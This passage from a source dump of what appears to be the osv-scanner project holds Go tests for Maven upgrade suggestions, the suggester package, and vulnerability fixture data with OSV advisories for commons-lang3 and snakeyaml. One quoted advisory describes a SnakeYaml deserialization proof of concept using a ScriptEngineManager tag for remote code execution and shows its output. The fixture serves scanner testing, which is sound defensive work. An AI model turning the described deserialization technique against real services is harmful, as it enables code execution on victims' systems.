resolve.Maven, Name: "org.import:xyz", }, Type: depProfileTwoMgmt, OrigRequire: "6.6.6", NewRequire: "6.7.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, Type: depProfileOne, OrigRequire: "1.2.3", NewRequire: "1.2.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, Type: depProfileOne, OrigRequire: "2.3.4", NewRequire: "2.3.5", }, }, Manifest: &mf, } sort.Slice(got.Deps, func(i, j int) bool { return got.Deps[i].Pkg.Name < got.Deps[j].Pkg.Name }) if !reflect.DeepEqual(got, want) { t.Fatalf("ManifestPatch suggested does not match expected: got %v\n want %v", got, want) } } func Test_suggestMavenVersion(t *testing.T) { t.Parallel() ctx := t.Context() lc := resolve.NewLocalClient() pk := resolve.PackageKey{ System: resolve.Maven, Name: "abc:xyz", } for _, version := range []string{"1.0.0", "1.0.1", "1.1.0", "1.2.3", "2.0.0", "2.2.2", "2.3.4"} { lc.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Concrete, Version: version, }}, nil) } tests := []struct { requirement string level upgrade.Level want string }{ {"1.0.0", upgrade.Major, "2.3.4"}, // No major updates allowed {"1.0.0", upgrade.Minor, "1.2.3"}, // Only allow patch updates {"1.0.0", upgrade.Patch, "1.0.1"}, // Version range requirement is not outdated {"[1.0.0,)", upgrade.Major, "[1.0.0,)"}, {"[2.0.0,2.3.4]", upgrade.Major, "[2.0.0,2.3.4]"}, // Version range requirement is outdated {"[2.0.0,2.3.4)", upgrade.Major, "2.3.4"}, {"[2.0.0,2.2.2]", upgrade.Major, "2.3.4"}, // Version range requirement is outdated but latest version is a major update {"[1.0.0,2.0.0)", upgrade.Major, "2.3.4"}, {"[1.0.0,2.0.0)", upgrade.Minor, "[1.0.0,2.0.0)"}, } for _, tt := range tests { vk := resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.requirement, } want := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: 
tt.want, }, } got, err := suggestMavenVersion(ctx, lc, resolve.RequirementVersion{VersionKey: vk}, tt.level) if err != nil { t.Fatalf("fail to suggest a new version for %v: %v", vk, err) } if !reflect.DeepEqual(got, want) { t.Errorf("suggestMavenVersion(%v, %v): got %s want %s", vk, tt.level, got, want) } } } func TestSuggestVersion_Guava(t *testing.T) { t.Parallel() ctx := t.Context() lc := resolve.NewLocalClient() pk := resolve.PackageKey{ System: resolve.Maven, Name: "com.google.guava:guava", } for _, version := range []string{"1.0.0", "1.0.1-android", "1.0.1-jre", "1.1.0-android", "1.1.0-jre", "2.0.0-android", "2.0.0-jre"} { lc.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Concrete, Version: version, }}, nil) } tests := []struct { requirement string level upgrade.Level want string }{ {"1.0.0", upgrade.Major, "2.0.0-jre"}, // Update to the version with the same flavour {"1.0.1-jre", upgrade.Major, "2.0.0-jre"}, {"1.0.1-android", upgrade.Major, "2.0.0-android"}, {"1.0.1-jre", upgrade.Minor, "1.1.0-jre"}, {"1.0.1-android", upgrade.Minor, "1.1.0-android"}, // Version range requirement is not outdated {"[1.0.0,)", upgrade.Major, "[1.0.0,)"}, // Version range requirement is outdated and the latest version is a major update {"[1.0.0,2.0.0)", upgrade.Major, "2.0.0-jre"}, {"[1.0.0,2.0.0)", upgrade.Minor, "[1.0.0,2.0.0)"}, } for _, tt := range tests { vk := resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.requirement, } want := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.want, }, } got, err := suggestMavenVersion(ctx, lc, resolve.RequirementVersion{VersionKey: vk}, tt.level) if err != nil { t.Fatalf("fail to suggest a new version for %v: %v", vk, err) } if !reflect.DeepEqual(got, want) { t.Errorf("suggestMavenVersion(%v, %v): got %s want %s", vk, tt.level, got, want) } } } func TestSuggestVersion_Commons(t 
*testing.T) { t.Parallel() ctx := t.Context() lc := resolve.NewLocalClient() pk := resolve.PackageKey{ System: resolve.Maven, Name: "commons-io:commons-io", } for _, version := range []string{"1.0.0", "1.0.1", "1.1.0", "2.0.0", "20010101.000000"} { lc.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Concrete, Version: version, }}, nil) } tests := []struct { requirement string level upgrade.Level want string }{ {"1.0.0", upgrade.Major, "2.0.0"}, // No major updates allowed {"1.0.0", upgrade.Minor, "1.1.0"}, // Only allow patch updates {"1.0.0", upgrade.Patch, "1.0.1"}, // Version range requirement is not outdated {"[1.0.0,)", upgrade.Major, "[1.0.0,)"}, // Version range requirement is outdated and the latest version is a major update {"[1.0.0,2.0.0)", upgrade.Major, "2.0.0"}, {"[1.0.0,2.0.0)", upgrade.Minor, "[1.0.0,2.0.0)"}, } for _, tt := range tests { vk := resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.requirement, } want := resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.want, }, } got, err := suggestMavenVersion(ctx, lc, resolve.RequirementVersion{VersionKey: vk}, tt.level) if err != nil { t.Fatalf("fail to suggest a new version for %v: %v", vk, err) } if !reflect.DeepEqual(got, want) { t.Errorf("suggestMavenVersion(%v, %v): got %s want %s", vk, tt.level, got, want) } } } ================================================ FILE: internal/remediation/suggest/suggest.go ================================================ // Package suggest provides functionality for suggesting version updates. 
package suggest

import (
	"context"
	"errors"
	"fmt"

	"deps.dev/util/resolve"
	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
	"github.com/google/osv-scanner/v2/internal/resolution/manifest"
)

// Options holds the settings a PatchSuggester takes into account when
// deciding which dependencies to update.
type Options struct {
	IgnoreDev     bool           // Whether we should ignore development dependencies for updates
	UpgradeConfig upgrade.Config // Allowed upgrade levels per package.
}

// A PatchSuggester provides an ecosystem-specific method for 'suggesting'
// ManifestPatch for dependency updates.
type PatchSuggester interface {
	// Suggest returns the ManifestPatch required to update the dependencies to
	// a newer version based on the given options.
	// ManifestPatch includes ecosystem-specific information.
	Suggest(ctx context.Context, client resolve.Client, mf manifest.Manifest, opts Options) (manifest.Patch, error)
}

// GetSuggester returns the PatchSuggester for the given ecosystem.
// Only resolve.Maven yields a suggester; resolve.NPM, resolve.UnknownSystem
// and every other system produce an error and a nil suggester.
func GetSuggester(system resolve.System) (PatchSuggester, error) {
	if system == resolve.Maven {
		return &MavenSuggester{}, nil
	}
	if system == resolve.NPM {
		return nil, errors.New("npm not yet supported")
	}
	if system == resolve.UnknownSystem {
		return nil, errors.New("unknown system")
	}

	return nil, fmt.Errorf("unsupported ecosystem: %v", system)
}

================================================
FILE: internal/remediation/testdata/maven-classifier/osv-scanner.toml
================================================
[[PackageOverrides]]
ignore = true

================================================
FILE: internal/remediation/testdata/maven-classifier/pom.xml
================================================
4.0.0 dev.osv maven-classifier 1 com.github.javafaker javafaker 1.0.2

================================================
FILE: internal/remediation/testdata/maven-classifier/universe.yaml
================================================
# Automatically generated by generate_mock_resolution_universe on 06 Nov 25 09:05 AEDT. DO NOT EDIT.
system: Maven schema: | com.github.javafaker:javafaker 1.0.2 org.apache.commons:commons-lang3@3.5 MavenClassifier android|org.yaml:snakeyaml@1.23 com.github.mifmif:generex@1.0.2 com.github.mifmif:generex 1.0.2 dk.brics.automaton:automaton@1.11-8 dk.brics.automaton:automaton 1.11-8 org.apache.commons:commons-lang3 3.5 3.18.0 org.apache.commons:commons-parent 41 85 org.apache:apache 18 35 org.junit:junit-bom 5.13.1 org.sonatype.oss:oss-parent 7 org.yaml:snakeyaml 1.23 ================================================ FILE: internal/remediation/testdata/maven-classifier/vulns.json ================================================ { "vulns": [ { "schema_version": "1.7.3", "id": "GHSA-j288-q9x7-2f5v", "published": "2025-07-11T15:31:37Z", "modified": "2025-11-05T20:34:04.566048Z", "aliases": [ "CVE-2025-48924" ], "related": [ "CGA-22cr-f3cr-c7cm", "CGA-29x5-f7v5-rrg6", "CGA-2fmr-p6rq-h6gj", "CGA-48h5-566h-rvpp", "CGA-4fcv-jq36-r7hx", "CGA-523g-m72h-8798", "CGA-6pxc-gq99-gpx4", "CGA-6v52-24xf-x875", "CGA-78fw-62xf-9rm8", "CGA-7r2r-4fw7-h3qv", "CGA-8c99-22mx-hg38", "CGA-8w2x-v747-c9c7", "CGA-8x43-fp55-w32w", "CGA-9j28-2jv5-qv67", "CGA-9rcm-4h29-rv8h", "CGA-ff3x-mc4g-82q2", "CGA-g3gg-7c6f-x6qx", "CGA-hj53-w7gr-6f9r", "CGA-j6cx-9v8j-x9cc", "CGA-j84p-prch-g8wm", "CGA-j8w2-rj92-x353", "CGA-j93m-mcxv-7hxr", "CGA-jvxv-2xch-6xjm", "CGA-m7pc-jwx3-vm7v", "CGA-mhg4-342v-w7xq", "CGA-mp4q-mrjj-8862", "CGA-p7fm-p736-2fmc", "CGA-p87f-qfxg-x45v", "CGA-pxx2-65vr-8cc4", "CGA-rc28-932p-89cv", "CGA-v52f-47gw-2xcm", "CGA-vxhq-8vpg-mr2p" ], "summary": "Apache Commons Lang is vulnerable to Uncontrolled Recursion when processing long inputs", "details": "Uncontrolled Recursion vulnerability in Apache Commons Lang.\n\nThis issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0.\n\nThe methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. 
Because an Error is usually not handled by applications and libraries, a StackOverflowError could cause an application to stop.\n\nUsers are recommended to upgrade to version 3.18.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-lang3", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-lang3" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0" }, { "fixed": "3.18.0" } ] } ], "versions": [ "3.0", "3.0.1", "3.1", "3.10", "3.11", "3.12.0", "3.13.0", "3.14.0", "3.15.0", "3.16.0", "3.17.0", "3.2", "3.2.1", "3.3", "3.3.1", "3.3.2", "3.4", "3.5", "3.6", "3.7", "3.8", "3.8.1", "3.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } }, { "package": { "name": "commons-lang:commons-lang", "ecosystem": "Maven", "purl": "pkg:maven/commons-lang/commons-lang" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0" }, { "last_affected": "2.6" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.5", "2.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-j288-q9x7-2f5v/GHSA-j288-q9x7-2f5v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48924" }, { "type": "WEB", "url": "https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-lang" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00000.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00032.html" }, { "type": "WEB", 
"url": "https://lists.debian.org/debian-lts-announce/2025/09/msg00036.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/11/1" } ], "database_specific": { "cwe_ids": [ "CWE-674" ], "github_reviewed": true, "github_reviewed_at": "2025-07-12T00:48:03Z", "nvd_published_at": "2025-07-11T15:15:24Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3mc7-4q67-w48m", "published": "2022-08-31T00:00:24Z", "modified": "2024-03-15T19:20:56.900754Z", "aliases": [ "CVE-2022-25857" ], "related": [ "CGA-8mhp-9r8c-whw4", "CGA-v8c3-wc4q-hfmx", "CGA-w753-xwwq-8ch4" ], "summary": "Uncontrolled Resource Consumption in snakeyaml", "details": "The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-3mc7-4q67-w48m/GHSA-3mc7-4q67-w48m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25857" }, { "type": "WEB", "url": "https://github.com/snakeyaml/snakeyaml/commit/fc300780da21f4bb92c148bc90257201220cf174" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/commits/fc300780da21f4bb92c148bc90257201220cf174" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/525" }, { "type": "PACKAGE", "url": 
"https://github.com/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGYAML-2806360" } ], "database_specific": { "cwe_ids": [ "CWE-400", "CWE-776" ], "github_reviewed": true, "github_reviewed_at": "2022-09-09T17:53:43Z", "nvd_published_at": "2022-08-30T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-98wm-3w3q-mw94", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:49:11.748743Z", "aliases": [ "CVE-2022-38751" ], "related": [ "CGA-765h-9f88-48rm", "CGA-hrp6-hg6x-533q", "CGA-vf63-mx7x-xrxr" ], "summary": "snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-98wm-3w3q-mw94/GHSA-98wm-3w3q-mw94.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38751" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/530/stackoverflow-oss-fuzz-47039" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/src/master/src/test/java/org/yaml/snakeyaml/issues/issue530/Fuzzy47039Test.java" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47039" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-16T17:45:10Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9w3m-gqgf-c4p9", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:59:23.253312Z", "aliases": [ "CVE-2022-38752" 
], "related": [ "CGA-7jxj-mv7q-86xp", "CGA-85g9-6hwh-32gx", "CGA-jqmf-qxq4-phw6", "CGA-ph82-mcm9-7236" ], "summary": "snakeYAML before 1.32 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.32" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.31", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-9w3m-gqgf-c4p9/GHSA-9w3m-gqgf-c4p9.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38752" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/531/stackoverflow-oss-fuzz-47081" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47081" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0009" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-13T21:29:45Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c4r9-r8fh-9vj2", "published": 
"2022-09-06T00:00:27Z", "modified": "2024-03-15T12:49:34.373482Z", "aliases": [ "CVE-2022-38749" ], "related": [ "CGA-8qv6-x47g-j5ch", "CGA-pc67-qgg2-hpmq", "CGA-prmx-f7v5-87x2" ], "summary": "snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "be.cylab:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/be.cylab/snakeyaml" }, "versions": [ "1.25.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "com.alipay.sofa.acts:acts-common-util", "ecosystem": "Maven", "purl": "pkg:maven/com.alipay.sofa.acts/acts-common-util" }, "versions": [ "1.0.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "io.prometheus.jmx:jmx_prometheus_httpserver", "ecosystem": "Maven", "purl": "pkg:maven/io.prometheus.jmx/jmx_prometheus_httpserver" }, "versions": [ "0.17.0" ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "io.prometheus.jmx:jmx_prometheus_httpserver_java6", "ecosystem": "Maven", "purl": "pkg:maven/io.prometheus.jmx/jmx_prometheus_httpserver_java6" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "0.18.0" } ] } ], "versions": [ "0.17.0", "0.17.1", "0.17.2", "0.18.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "org.testifyproject.external:external-snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.testifyproject.external/external-snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.0.6" } ] } ], "versions": [ "0.9.5", "0.9.6", "0.9.7", "0.9.8", "0.9.9", "1.0.0", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } }, { "package": { "name": "pl.droidsonroids.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/pl.droidsonroids.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "last_affected": "1.18.2" } ] } ], "versions": [ "1.18-android", "1.18.1", "1.18.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-c4r9-r8fh-9vj2/GHSA-c4r9-r8fh-9vj2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38749" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534.pdf" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": 
"https://bitbucket.org/snakeyaml/snakeyaml/issues/525/got-stackoverflowerror-for-many-open" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47024" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-15T03:27:43Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hhhw-99gj-p3c3", "published": "2022-09-06T00:00:27Z", "modified": "2024-03-15T12:49:06.729862Z", "aliases": [ "CVE-2022-38750" ], "related": [ "CGA-5jp4-3j6v-xcj7", "CGA-67vf-v8g4-c73c", "CGA-xgv4-vx4w-mxg9" ], "summary": "snakeYAML before 1.31 vulnerable to Denial of Service due to Out-of-bounds Write", "details": "Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). 
If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.", "affected": [ { "package": { "name": "org.yaml:snakeyaml", "ecosystem": "Maven", "purl": "pkg:maven/org.yaml/snakeyaml" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.31" } ] } ], "versions": [ "1.10", "1.11", "1.12", "1.13", "1.14", "1.15", "1.16", "1.17", "1.18", "1.19", "1.20", "1.21", "1.22", "1.23", "1.24", "1.25", "1.26", "1.27", "1.28", "1.29", "1.30", "1.4", "1.5", "1.6", "1.7", "1.8", "1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-hhhw-99gj-p3c3/GHSA-hhhw-99gj-p3c3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38750" }, { "type": "PACKAGE", "url": "https://bitbucket.org/snakeyaml/snakeyaml" }, { "type": "WEB", "url": "https://bitbucket.org/snakeyaml/snakeyaml/issues/526/stackoverflow-oss-fuzz-47027" }, { "type": "WEB", "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47027" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00001.html" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-28" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20240315-0010" } ], "database_specific": { "cwe_ids": [ "CWE-121", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-09-16T21:17:07Z", "nvd_published_at": "2022-09-05T10:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mjmj-j48q-9wg2", "published": "2022-12-12T21:19:47Z", "modified": "2025-06-18T18:37:13.356609Z", "aliases": [ "CVE-2022-1471" ], "related": [ "CGA-23vr-f599-cmcv", "CGA-4j46-m77j-2622", "CGA-7w78-ggr5-pfxv", "CGA-7xrx-m75c-pc58", "CGA-g9mf-8vr4-m7x9", "CGA-gmmv-497r-8r6h", 
"CGA-mhgw-xcxh-mprj", "CGA-p6jg-fjvm-fx3w", "CGA-r36x-jx84-2cgp", "CVE-2022-1471" ], "summary": "SnakeYaml Constructor Deserialization Remote Code Execution", "details": "### Summary\nSnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows\nany type be deserialized given the following line:\n\nnew Yaml(new Constructor(TestDataClass.class)).load(yamlContent);\n\nTypes do not have to match the types of properties in the\ntarget class. A `ConstructorException` is thrown, but only after a malicious\npayload is deserialized.\n\n### Severity\nHigh, lack of type checks during deserialization allows remote code execution.\n\n### Proof of Concept\nExecute `bash run.sh`. The PoC uses Constructor to deserialize a payload\nfor RCE. RCE is demonstrated by using a payload which performs a http request to\nhttp://127.0.0.1:8000.\n\nExample output of successful run of proof of concept:\n\n```\n$ bash run.sh\n\n[+] Downloading snakeyaml if needed\n[+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE\nnc: no process found\n[+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.\n[+] An exception is expected.\nException:\nCannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0\n in 'string', line 1, column 1:\n payload: !!javax.script.ScriptEn ... \n ^\nCan not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n in 'string', line 1, column 10:\n payload: !!javax.script.ScriptEngineManag ... 
\n ^\n\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)\n\tat org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)\n\tat org.yaml.snakeyaml.Yaml.load(Yaml.java:416)\n\tat Main.main(Main.java:37)\nCaused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)\n\tat 